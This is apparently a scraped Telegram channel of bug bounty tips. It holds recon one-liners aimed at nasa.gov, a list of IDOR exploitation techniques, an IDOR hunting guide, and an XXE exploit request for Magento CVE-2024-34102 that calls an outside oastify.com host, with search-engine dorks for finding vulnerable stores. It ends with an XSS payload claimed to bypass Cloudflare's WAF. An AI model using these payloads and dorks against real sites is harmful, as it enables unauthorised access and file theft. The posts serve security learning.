China now has their own GitHub/public Git repository hosting service called GitCode; it is owned and operated by CSDN under the company name "้ๅบๅผๆบๅ
ฑๅ็งๆๆ้ๅ
ฌๅธ"
It is being reported that many users' repository are being cloned and re-hosted on GitCode without authorization - meaning your project may very well be on this service without you explicitly allowing.
tldr: GitCode or China is attempting to mirror/clone the entire GitHub over to their own servers and there's nothing you can do about it, even if your license somehow disagrees with it.
Credit: https://x.com/azakasekai_/status/1805844941438075163?s=46&t=GxBcd0lJbjtL_W3TmBw-tA
#github #gitcode
It is being reported that many users' repository are being cloned and re-hosted on GitCode without authorization - meaning your project may very well be on this service without you explicitly allowing.
tldr: GitCode or China is attempting to mirror/clone the entire GitHub over to their own servers and there's nothing you can do about it, even if your license somehow disagrees with it.
Credit: https://x.com/azakasekai_/status/1805844941438075163?s=46&t=GxBcd0lJbjtL_W3TmBw-tA
#github #gitcode
๐ณ3๐1
Brut Security
Looking for someone who can contribute on the next 30 days Bug Bounty Challenge. Similar to this https://nas.io/brutsecurity
Day 1: Run Subfinder
Day 2: Scrap Js
Day 3: Report etc. till day 30.
Please open Telegram to view this post
VIEW IN TELEGRAM
Telegram
Discussion
Community Discussion
Please open Telegram to view this post
VIEW IN TELEGRAM
Brut Security pinned ยซ๐ฅ Join Our Bugbounty Discussion Group ๐ฅ ๐ฅ https://t.me/brutsec๐ฅ ๐ค https://discord.gg/GZBsQMY6๐ค ยป
โ๏ธPentest-Windows
๐ฐWindows11 Penetration Suite Toolkit
๐A Windows penetration testing environment that works out of the box.
โ ๏ธThis project was created for educational purposes and should not be used in environments without legal authorization.
๐Link: https://lnkd.in/gtX3GbR8
๐#infosec #cybersecurity #hacking #pentesting #security #infosec #cybersecurity #hacking #pentesting #security #oscp #ceh #nmap #infosec #hackingtools #networksecurity
๐ฐWindows11 Penetration Suite Toolkit
๐A Windows penetration testing environment that works out of the box.
โ ๏ธThis project was created for educational purposes and should not be used in environments without legal authorization.
๐Link: https://lnkd.in/gtX3GbR8
๐#infosec #cybersecurity #hacking #pentesting #security #infosec #cybersecurity #hacking #pentesting #security #oscp #ceh #nmap #infosec #hackingtools #networksecurity
๐ฅ1
This media is not supported in your browser
VIEW IN TELEGRAM
๐ขYou can now passively enumerate all endpoints of a website with katana. (No need waybackurls)
๐Example:
๐จYou can then check the status of these endpoints or filter in order to find new vulnerabilities:
โ Example:
๐Example:
echo nasa.gov | katana -passive -f qurl -pss waybackarchive,commoncrawl,alienvault | tee endpoints
๐จYou can then check the status of these endpoints or filter in order to find new vulnerabilities:
โ Example:
echo nasa.gov | katana -passive -f qurl -pss waybackarchive,commoncrawl,alienvault | httpx -mc 200 | grep -E '\.(js|php)$' | tee specificEndpoints
๐2๐ฅ1
๐ช๐ปScan for Adobe Commerce & Magento - XXE
(CVE-2024-34102) discovered by Sergey Temnikov using Nuclei Template @pdnuclei
๐ Details: https://lnkd.in/dBy32DtY
๐ Nuclei Template: https://lnkd.in/dUNFMUny
๐ง GitHub PR: https://lnkd.in/dqu65C5i
#bugbounty #adobe #pdteam #infos
(CVE-2024-34102) discovered by Sergey Temnikov using Nuclei Template @pdnuclei
๐ Details: https://lnkd.in/dBy32DtY
๐ Nuclei Template: https://lnkd.in/dUNFMUny
๐ง GitHub PR: https://lnkd.in/dqu65C5i
#bugbounty #adobe #pdteam #infos
๐1
Advanced IDORs - 9 Techniques by Intigriti:
1. Exploiting Basic IDORs
How to: Modify a predictable numeric ID in the request URL or parameters.
Example: GET /user/email?userId=1002 (change userId to another value).
2. Exploiting IDORs via Parameter Pollution
How to: Inject multiple instances of the same parameter in the request.
Example: POST /update_profile with user_id=1234&user_id=5678.
3. Exploiting IDORs via JSON Globbing
How to: Manipulate JSON fields with arrays, booleans, wildcards, or large integers.
Example: { "user_id": ["1234", "5678"] } or { "user_id": "*" }.
4. Exploiting Method-Based IDORs
How to: Change the HTTP method to bypass access controls.
Example: Change GET /user/data to POST /user/data.
5. Exploiting Content-Type-Based IDORs
How to: Alter the Content-Type header to manipulate request processing.
Example: Use Content-Type: application/json instead of Content-Type: text/plain.
6. Exploiting IDORs via Deprecated API Versions
How to: Use older API versions that may lack updated security checks.
Example: Access /v1/user/data instead of /v2/user/data.
7. Exploiting IDORs in APIs that Use Static Keywords
How to: Replace keywords like current or me with numerical user IDs.
Example: Change /user/profile/current to /user/profile/1002.
8. Exploiting IDORs that Require Unpredictable IDs
How to: Find references to UUIDs or hashes in other parts of the application.
Example: Extract UUID from profile URLs like /profile/123e4567-e89b-12d3-a456-426614174000.
9. Exploiting Second-Order IDOR Vulnerabilities
How to: Manipulate stored IDs used in subsequent processes.
Example: Submit a form that stores your ID, then trigger an export process that retrieves data using that stored ID.
----------------------------------------------------------
I've never seen real-world examples for some of them, but they are definitely worth the try.
#pentesting #appsec #bugbounty #cybersecurity
Here's the full scoop: https://buff.ly/3zfhhzL
1. Exploiting Basic IDORs
How to: Modify a predictable numeric ID in the request URL or parameters.
Example: GET /user/email?userId=1002 (change userId to another value).
2. Exploiting IDORs via Parameter Pollution
How to: Inject multiple instances of the same parameter in the request.
Example: POST /update_profile with user_id=1234&user_id=5678.
3. Exploiting IDORs via JSON Globbing
How to: Manipulate JSON fields with arrays, booleans, wildcards, or large integers.
Example: { "user_id": ["1234", "5678"] } or { "user_id": "*" }.
4. Exploiting Method-Based IDORs
How to: Change the HTTP method to bypass access controls.
Example: Change GET /user/data to POST /user/data.
5. Exploiting Content-Type-Based IDORs
How to: Alter the Content-Type header to manipulate request processing.
Example: Use Content-Type: application/json instead of Content-Type: text/plain.
6. Exploiting IDORs via Deprecated API Versions
How to: Use older API versions that may lack updated security checks.
Example: Access /v1/user/data instead of /v2/user/data.
7. Exploiting IDORs in APIs that Use Static Keywords
How to: Replace keywords like current or me with numerical user IDs.
Example: Change /user/profile/current to /user/profile/1002.
8. Exploiting IDORs that Require Unpredictable IDs
How to: Find references to UUIDs or hashes in other parts of the application.
Example: Extract UUID from profile URLs like /profile/123e4567-e89b-12d3-a456-426614174000.
9. Exploiting Second-Order IDOR Vulnerabilities
How to: Manipulate stored IDs used in subsequent processes.
Example: Submit a form that stores your ID, then trigger an export process that retrieves data using that stored ID.
----------------------------------------------------------
I've never seen real-world examples for some of them, but they are definitely worth the try.
#pentesting #appsec #bugbounty #cybersecurity
Here's the full scoop: https://buff.ly/3zfhhzL
๐น Web Scanner & Crawler
๐นFuzzing with Intruder (Part3)
๐นFuzzing with Intruder (Part2)
๐นFuzzing with Intruder (Part1)
๐นXSS Validator
๐นConfiguring Proxy
๐นBurp Collaborator
๐นHackBar
๐นBurp Sequencer
๐นTurbo Intruder
๐นEngagement Tools
๐นPayload Processing Rule (Part2)
๐นPayload Processing Rule (Part1)
๐นBeginners Guide to Burpsuite Payloads (Part2)
๐นBeginners Guide to Burpsuite Payloads (Part1)
๐นEncoder & Decoder Tutorial
๐นActive Scan++
๐นSoftware Vulnerability Scanner
๐นBurpโs Project Management
๐นRepeater
Please open Telegram to view this post
VIEW IN TELEGRAM
๐4๐ฅ2๐ซก1
dubbed โCosmicStingโ jeopardizes millions of online stores
built on Adobe Commerce and Magento platforms.
to sensitive files, including those containing passwords.
When combined with a recent Linux bug (CVE-2024-2961),
the vulnerability can be escalated to remote code execution.
Hunter: http://product.name="Adobe Magento"
FOFA: app="Adobe-Magento"
SHODAN: http.html:"magento-template"
POST /rest/V1/guest-carts/1/estimate-shipping-methods HTTP/2
Content-Type: application/json
Content-Length: 192
{"address":{"totalsCollector":{"collectorList":{"totalCollector":{"sourceData":
{"data":"http://*.oastify.com/xxe.xml","dataIsURL":true,"options":12345678}}}}}}
Please open Telegram to view this post
VIEW IN TELEGRAM
YouTube
๐จUnauthenticated Magento XXE | CVE-2024-34102 | Bug Bounty POC | Brut Security
๐จMagento XXE CVE-2024-34102: A newly discovered vulnerability
dubbed โCosmicStingโ jeopardizes millions of online stores
built on Adobe Commerce and Magento platforms.
โ CosmicSting enables attackers to gain unauthorized access
to sensitive files, includingโฆ
dubbed โCosmicStingโ jeopardizes millions of online stores
built on Adobe Commerce and Magento platforms.
โ CosmicSting enables attackers to gain unauthorized access
to sensitive files, includingโฆ
๐6๐คฏ2๐ฑ1
#bugbounty #bugbountytips
Please open Telegram to view this post
VIEW IN TELEGRAM
๐2๐ค1
This media is not supported in your browser
VIEW IN TELEGRAM
Whoever is commenting it doesn't work on latest updates of firefox, the video is for them only. No offence to anyone but you guys lack a lot of research's!
๐3โค1๐ฅ1
When combined with a recent Linux bug (CVE-2024-2961),the vulnerability can be escalated to remote code execution.
Please open Telegram to view this post
VIEW IN TELEGRAM
YouTube
Unauthenticated Magento XXE to Path traversal | CVE-2024-34102 | Bug Bounty POC
๐ฅMagento XXE CVE-2024-34102: A newly discovered vulnerability dubbed โCosmicStingโ jeopardizes millions of online stores
built on Adobe Commerce and Magento platforms.
โ ๏ธCosmicSting enables attackers to gain unauthorized access to sensitive filesโฆ
built on Adobe Commerce and Magento platforms.
โ ๏ธCosmicSting enables attackers to gain unauthorized access to sensitive filesโฆ
๐2๐ฑ2
Hope you guys learning from the resources which I am sharing, if you have any suggestions or questions you can do comment.
Thanks and Regards,
The Brut Security Teamโ๏ธ
Thanks and Regards,
The Brut Security Team
Please open Telegram to view this post
VIEW IN TELEGRAM
๐ฅ6๐4
When hunting for IDORs during a bug bounty program, consider the following tip:
1. Leverage archive tools: Utilize tools like Wayback Machine or specialized software like Waymore to manually archive and analyze subdomains. This can help uncover hidden or previously accessible endpoints that may now be vulnerable to IDORs.
Example usage:
python3 waymore.py -i sub.target.com -mode U -xcc
2. Extract all paths with specific keywords: After identifying potential paths, extract all URLs containing specific keywords, such as "admin" or "manager," to narrow down your search.
Example command:
cat result.txt | grep "admin"
3. Fuzzing: If you find a suspicious path but it doesn't yield any results, try fuzzing the URL with a wordlist. This can help uncover hidden or unintended parameters.
Example usage:
ffuf -u https://sub.taget.com/promo/offer/1234/FUZZ -mc 200
4. Brute force: If you find a path with a dynamic ID, consider brute-forcing the last digits or numbers. This can help uncover additional sensitive information or functionality.
Example scenario:
Found path: https://sub.taget.com/promo/offer/1234/details
Brute-force the last 3 digits: 1234
By following these steps, you can uncover hidden or unintended IDORs, leading to potential security vulnerabilities and rewards in bug bounty programs.
1. Leverage archive tools: Utilize tools like Wayback Machine or specialized software like Waymore to manually archive and analyze subdomains. This can help uncover hidden or previously accessible endpoints that may now be vulnerable to IDORs.
Example usage:
python3 waymore.py -i sub.target.com -mode U -xcc
2. Extract all paths with specific keywords: After identifying potential paths, extract all URLs containing specific keywords, such as "admin" or "manager," to narrow down your search.
Example command:
cat result.txt | grep "admin"
3. Fuzzing: If you find a suspicious path but it doesn't yield any results, try fuzzing the URL with a wordlist. This can help uncover hidden or unintended parameters.
Example usage:
ffuf -u https://sub.taget.com/promo/offer/1234/FUZZ -mc 200
4. Brute force: If you find a path with a dynamic ID, consider brute-forcing the last digits or numbers. This can help uncover additional sensitive information or functionality.
Example scenario:
Found path: https://sub.taget.com/promo/offer/1234/details
Brute-force the last 3 digits: 1234
By following these steps, you can uncover hidden or unintended IDORs, leading to potential security vulnerabilities and rewards in bug bounty programs.
๐ฅ8๐1
A payload that bypasses Cloudflare WAF
<img/src=x onError="`${x}`;alert(`Hello`);">
<img/src=x onError="`${x}`;alert(`Hello`);">
๐11